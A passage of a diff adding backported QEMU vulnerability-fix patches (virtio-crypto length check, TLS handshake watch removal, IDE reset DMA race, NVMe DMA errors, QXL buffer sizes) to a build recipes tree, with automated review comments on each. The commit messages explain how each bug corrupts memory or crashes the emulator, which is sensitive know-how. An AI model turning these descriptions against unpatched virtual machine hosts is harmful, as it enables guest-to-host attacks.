+
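Review bot: `open_regular()` calls `open(pathname, flags, mode)` with the client-supplied flags and only afterwards runs `close_if_special_file()`, so the open has already taken place on the special file by the time its type is checked; for a FIFO, that `open()` can block the proxy helper before the check is reached. `openat_file()` in `9p-util.h` appears to avoid this by opening with `O_NONBLOCK` (its context comment says the flag "was only needed to open the file"), and the helper could follow the same pattern: `fd = open(pathname, flags | O_NONBLOCK, mode);`, then clear the flag with `fcntl(fd, F_SETFL, ...)` once the descriptor has passed the type check. A short comment on `open_regular()` stating that the check is post-open, and that side effects of opening a device node are therefore not prevented, would also help the next maintainer.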
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
new file mode 100644
index 0000000000..7144bdca46
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
+From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
+From: zhenwei pi <pizhenwei@bytedance.com>
+Date: Thu, 3 Aug 2023 10:43:13 +0800
+Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
+
+For symmetric algorithms, the length of ciphertext must be as same
+as the plaintext.
+The missing verification of the src_len and the dst_len in
+virtio_crypto_sym_op_helper() may lead buffer overflow/divulged.
+
+This patch is originally written by Yiming Tao for QEMU-SECURITY,
+resend it(a few changes of error message) in qemu-devel.
+
+Fixes: CVE-2023-3180
+Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
+Cc: Gonglei <arei.gonglei@huawei.com>
+Cc: Mauro Matteo Cascella <mcascell@redhat.com>
+Cc: Yiming Tao <taoym@zju.edu.cn>
+Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
+Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
+CVE: CVE-2023-3180
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ hw/virtio/virtio-crypto.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
+index 44faf5a522b..13aec771e11 100644
+--- a/hw/virtio/virtio-crypto.c
++++ b/hw/virtio/virtio-crypto.c
+@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
+ return NULL;
+ }
+
++ if (unlikely(src_len != dst_len)) {
++ virtio_error(vdev, "sym request src len is different from dst len");
++ return NULL;
++ }
++
+ max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
+ if (unlikely(max_len > vcrypto->conf.max_size)) {
+ virtio_error(vdev, "virtio-crypto too big length");
+--
+GitLab
+
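Review bot: The `virtio_error()` message added in `virtio_crypto_sym_op_helper()` reports the mismatch without the two lengths, so whoever triages the log has nothing to correlate with the guest's request. Assuming `src_len` and `dst_len` are 32-bit unsigned (the `(uint64_t)` widening on the following line suggests so, but their declarations are outside the hunk), `virtio_error(vdev, "sym request src len %" PRIu32 " is different from dst len %" PRIu32, src_len, dst_len);` keeps the check identical and records both values. The function body starts and ends outside the hunk.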
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
new file mode 100644
index 0000000000..2942e84cac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
+From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Tue, 20 Jun 2023 09:45:34 +0100
+Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The TLS handshake make take some time to complete, during which time an
+I/O watch might be registered with the main loop. If the owner of the
+I/O channel invokes qio_channel_close() while the handshake is waiting
+to continue the I/O watch must be removed. Failing to remove it will
+later trigger the completion callback which the owner is not expecting
+to receive. In the case of the VNC server, this results in a SEGV as
+vnc_disconnect_start() tries to shutdown a client connection that is
+already gone / NULL.
+
+CVE-2023-3354
+Reported-by: jiangyegen <jiangyegen@huawei.com>
+Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
+CVE: CVE-2023-3354
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ include/io/channel-tls.h | 1 +
+ io/channel-tls.c | 18 ++++++++++++------
+ 2 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
+index fdbdf12f..e49e2831 100644
+--- a/include/io/channel-tls.h
++++ b/include/io/channel-tls.h
+@@ -49,6 +49,7 @@ struct QIOChannelTLS {
+ QIOChannel *master;
+ QCryptoTLSSession *session;
+ QIOChannelShutdown shutdown;
++ guint hs_ioc_tag;
+ };
+
+ /**
+diff --git a/io/channel-tls.c b/io/channel-tls.c
+index 7ec8ceff..8b32fbde 100644
+--- a/io/channel-tls.c
++++ b/io/channel-tls.c
+@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
+ }
+
+ trace_qio_channel_tls_handshake_pending(ioc, status);
+- qio_channel_add_watch_full(ioc->master,
+- condition,
+- qio_channel_tls_handshake_io,
+- data,
+- NULL,
+- context);
++ ioc->hs_ioc_tag =
++ qio_channel_add_watch_full(ioc->master,
++ condition,
++ qio_channel_tls_handshake_io,
++ data,
++ NULL,
++ context);
+ }
+ }
+
+@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
+ qio_task_get_source(task));
+
++ tioc->hs_ioc_tag = 0;
+ g_free(data);
+ qio_channel_tls_handshake_task(tioc, task, context);
+
+@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
+ {
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
+
++ if (tioc->hs_ioc_tag) {
++ g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
++ }
++
+ return qio_channel_close(tioc->master, errp);
+ }
+
+--
+2.25.1
+
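Review bot: `g_clear_handle_id()` in the `qio_channel_tls_close()` hunk is a GLib 2.56 API, and this backport targets qemu 4.2.0, whose minimum supported GLib may be older than that of the upstream tree the fix was written for; that should be confirmed before relying on it. The surrounding `if (tioc->hs_ioc_tag)` is also redundant with it, since `g_clear_handle_id()` already does nothing for a zero tag. If the older floor applies, the same effect inside the existing `if` is `g_source_remove(tioc->hs_ioc_tag);` followed by `tioc->hs_ioc_tag = 0;`.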
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
new file mode 100644
index 0000000000..db02210fa4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
+From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
+From: Fiona Ebner <f.ebner@proxmox.com>
+Date: Wed, 6 Sep 2023 15:09:21 +0200
+Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
+ state
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If there is a pending DMA operation during ide_bus_reset(), the fact
+that the IDEState is already reset before the operation is canceled
+can be problematic. In particular, ide_dma_cb() might be called and
+then use the reset IDEState which contains the signature after the
+reset. When used to construct the IO operation this leads to
+ide_get_sector() returning 0 and nsector being 1. This is particularly
+bad, because a write command will thus destroy the first sector which
+often contains a partition table or similar.
+
+Traces showing the unsolicited write happening with IDEState
+0x5595af6949d0 being used after reset:
+
+> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
+> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
+> ide_reset IDEstate 0x5595af6949d0
+> ide_reset IDEstate 0x5595af694da8
+> ide_bus_reset_aio aio_cancel
+> dma_aio_cancel dbs=0x7f64600089a0
+> dma_blk_cb dbs=0x7f64600089a0 ret=0
+> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
+> ahci_populate_sglist ahci(0x5595af6923f0)[0]
+> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
+> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
+> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
+> dma_blk_cb dbs=0x7f6420802010 ret=0
+
+> (gdb) p *qiov
+> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
+> iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
+> size = 512}}}
+> (gdb) bt
+> #0 blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
+> cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
+> at ../block/block-backend.c:1682
+> #1 0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
+> at ../softmmu/dma-helpers.c:179
+> #2 0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
+> io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
+> cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
+> dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
+> #3 0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
+> at ../softmmu/dma-helpers.c:280
+> #4 0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
+> at ../hw/ide/core.c:953
+> #5 0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
+> at ../softmmu/dma-helpers.c:107
+> #6 dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
+> #7 0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
+> at ../block/block-backend.c:1527
+> #8 blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
+> #9 blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
+> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
+> i1=<optimized out>) at ../util/coroutine-ucontext.c:177
+
+Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Tested-by: simon.rowe@nutanix.com
+Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
+CVE: CVE-2023-5088
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/ide/core.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/hw/ide/core.c b/hw/ide/core.c
+index b5e0dcd29b2..63ba665f3d2 100644
+--- a/hw/ide/core.c
++++ b/hw/ide/core.c
+@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
+
+ void ide_bus_reset(IDEBus *bus)
+ {
+- bus->unit = 0;
+- bus->cmd = 0;
+- ide_reset(&bus->ifs[0]);
+- ide_reset(&bus->ifs[1]);
+- ide_clear_hob(bus);
+-
+- /* pending async DMA */
++ /* pending async DMA - needs the IDEState before it is reset */
+ if (bus->dma->aiocb) {
+ trace_ide_bus_reset_aio();
+ blk_aio_cancel(bus->dma->aiocb);
+ bus->dma->aiocb = NULL;
+ }
+
++ bus->unit = 0;
++ bus->cmd = 0;
++ ide_reset(&bus->ifs[0]);
++ ide_reset(&bus->ifs[1]);
++ ide_clear_hob(bus);
++
+ /* reset dma provider too */
+ if (bus->dma->ops->reset) {
+ bus->dma->ops->reset(bus->dma);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
new file mode 100644
index 0000000000..0fdae8351a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
+From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:07:17 -0700
+Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
+
+Handling DMA errors gracefully is required for the device to pass the
+block/011 test ("disable PCI device while doing I/O") in the blktests
+suite.
+
+With this patch the device sets the Controller Fatal Status bit in the
+CSTS register when failing to read from a submission queue or writing to
+a completion queue; expecting the host to reset the controller.
+
+If DMA errors occur at any other point in the execution of the command
+(say, while mapping the PRPs), the command is aborted with a Data
+Transfer Error status code.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 41 +++++++++++++++++++++++++++++++----------
+ hw/block/trace-events | 3 +++
+ 2 files changed, 34 insertions(+), 10 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index e6f24a6..bda446d 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
+-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
++static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- return;
++ return 0;
+ }
+
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ hwaddr trans_len = n->page_size - (prp1 % n->page_size);
+ trans_len = MIN(len, trans_len);
+ int num_prps = (len >> n->page_bits) + 1;
++ int ret;
+
+ if (unlikely(!prp1)) {
+ trace_nvme_err_invalid_prp();
+@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp2);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ while (len != 0) {
+ uint64_t prp_ent = le64_to_cpu(prp_list[i]);
+
+@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ i = 0;
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp_ent, (void *)prp_list,
+- prp_trans);
++ ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
++ prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp_ent);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ prp_ent = le64_to_cpu(prp_list[i]);
+ }
+
+@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
+ NvmeCQueue *cq = opaque;
+ NvmeCtrl *n = cq->ctrl;
+ NvmeRequest *req, *next;
++ int ret;
+
+ QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
+ NvmeSQueue *sq;
+@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
+ break;
+ }
+
+- QTAILQ_REMOVE(&cq->req_list, req, entry);
+ sq = req->sq;
+ req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
+ req->cqe.sq_id = cpu_to_le16(sq->sqid);
+ req->cqe.sq_head = cpu_to_le16(sq->head);
+ addr = cq->dma_addr + cq->tail * n->cqe_size;
++ ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
++ sizeof(req->cqe));
++ if (ret) {
++ trace_pci_nvme_err_addr_write(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
++ QTAILQ_REMOVE(&cq->req_list, req, entry);
+ nvme_inc_cq_tail(cq);
+- pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
+- sizeof(req->cqe));
+ QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
+ }
+ if (cq->tail != cq->head) {
+@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
+
+ while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
+ addr = sq->dma_addr + sq->head * n->sqe_size;
+- nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
++ if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
++ trace_pci_nvme_err_addr_read(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
+ nvme_inc_sq_head(sq);
+
+ req = QTAILQ_FIRST(&sq->req_list);
+diff --git a/hw/block/trace-events b/hw/block/trace-events
+index c03e80c..4e4ad4e 100644
+--- a/hw/block/trace-events
++++ b/hw/block/trace-events
+@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
+ nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
+
+ # nvme traces for error conditions
++pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_cfs(void) "controller fatal status"
+ nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
+ nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
+ nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
+--
+1.8.3.1
+
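Review bot: The two new `return NVME_DATA_TRAS_ERROR;` exits in `nvme_map_prp()` leave the function directly from inside the PRP-list handling, after the point where `qsg` or `iov` would already have been set up for `prp1`. That set-up and the function's other error exits are outside the hunk, so this is inferred. If those exits release the list through a shared cleanup path, the new ones should go through the same path instead of returning, otherwise a guest that can provoke DMA read failures may leak the list on each failed command. This patch and hw-block-nvme-refactor-nvme_addr_read.patch also carry no `Upstream-Status:` line, unlike the other patches added here.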
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
new file mode 100644
index 0000000000..66ada52efb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
+From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
+From: Klaus Jensen <k.jensen@samsung.com>
+Date: Tue, 9 Jun 2020 21:03:17 +0200
+Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Pull the controller memory buffer check to its own function. The check
+will be used on its own in later patches.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+---
+ hw/block/nvme.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index 12d8254..e6f24a6 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -52,14 +52,22 @@
+
+ static void nvme_process_sq(void *opaque);
+
++static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr low = n->ctrl_mem.addr;
++ hwaddr hi = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
++
++ return addr >= low && addr < hi;
++}
++
+ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+- if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+- addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
++ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- } else {
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return;
+ }
++
++ pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+--
+1.8.3.1
+
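Review bot: The copy in `nvme_addr_read()` is guarded only by `nvme_addr_is_cmb(n, addr)`, which tests the start address, so a read that begins inside the controller memory buffer and runs `size` bytes past its end still takes the `memcpy()` branch. Whether that overruns `n->cmbuf` depends on its allocation, which is outside the hunk, but the guard should cover the last byte too: compute `hwaddr hi = addr + size - 1;` and require `hi >= addr && nvme_addr_is_cmb(n, addr) && nvme_addr_is_cmb(n, hi)` before copying. The same unchanged branch is carried through hw-block-nvme-handle-dma-errors.patch. A one-line comment on `nvme_addr_is_cmb()` stating that the range is half-open, `/* true if addr lies in [ctrl_mem.addr, ctrl_mem.addr + size) */`, would also help.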
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
+From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:39 +0100
+Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Currently qxl_phys2virt() doesn't check for buffer overrun.
+In order to do so in the next commit, pass the buffer size
+as argument.
+
+For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
+verify the size of the chunked data ahead, checking we can
+access 'sizeof(QXLCursor) + chunk->data_size' bytes.
+Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
+assumed to fit in one chunk, no change are required.
+In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
+qxl_unpack_chunks().
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Acked-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-4-philmd@linaro.org>
+
+Backport and rebase patch to fix compile error which imported by CVE-2022-4144.patch:
+
+/qxl.c: In function 'qxl_phys2virt':
+| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
+| 1508 | if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+| | ^~~~
+| | gsize
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl-logger.c | 22 +++++++++++++++++++---
+ hw/display/qxl-render.c | 20 ++++++++++++++++----
+ hw/display/qxl.c | 17 +++++++++++------
+ hw/display/qxl.h | 3 ++-
+ 4 files changed, 48 insertions(+), 14 deletions(-)
+
+diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
+index 2ec6d8fa..031ddfec 100644
+--- a/hw/display/qxl-logger.c
++++ b/hw/display/qxl-logger.c
+@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
+ QXLImage *image;
+ QXLImageDescriptor *desc;
+
+- image = qxl_phys2virt(qxl, addr, group_id);
++ image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
+ if (!image) {
+ return 1;
+ }
+@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
+ cmd->u.set.position.y,
+ cmd->u.set.visible ? "yes" : "no",
+ cmd->u.set.shape);
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
++ sizeof(QXLCursor));
+ if (!cursor) {
+ return 1;
+ }
+@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ {
+ bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
+ void *data;
++ size_t datasz;
+ int ret;
+
+ if (!qxl->cmdlog) {
+@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_name(qxl_type, ext->cmd.type),
+ compat ? "(compat)" : "");
+
+- data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ switch (ext->cmd.type) {
++ case QXL_CMD_DRAW:
++ datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
++ break;
++ case QXL_CMD_SURFACE:
++ datasz = sizeof(QXLSurfaceCmd);
++ break;
++ case QXL_CMD_CURSOR:
++ datasz = sizeof(QXLCursorCmd);
++ break;
++ default:
++ goto out;
++ }
++ data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
+ if (!data) {
+ return 1;
+ }
+@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_log_cmd_cursor(qxl, data, ext->group_id);
+ break;
+ }
++out:
+ fprintf(stderr, "\n");
+ return 0;
+ }
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d532e157..a65a6d64 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
+ qxl->guest_primary.resized = 0;
+ qxl->guest_primary.data = qxl_phys2virt(qxl,
+ qxl->guest_primary.surface.mem,
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST,
++ qxl->guest_primary.abs_stride
++ * height);
+ if (!qxl->guest_primary.data) {
+ return;
+ }
+@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
+ if (offset == size) {
+ return;
+ }
+- chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
++ chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
++ sizeof(QXLDataChunk) + chunk->data_size);
+ if (!chunk) {
+ return;
+ }
+@@ -289,7 +292,8 @@ fail:
+ /* called from spice server thread context only */
+ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+ QXLCursor *cursor;
+ QEMUCursor *c;
+
+@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ }
+ switch (cmd->type) {
+ case QXL_CURSOR_SET:
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
++ /* First read the QXLCursor to get QXLDataChunk::data_size ... */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor));
++ if (!cursor) {
++ return 1;
++ }
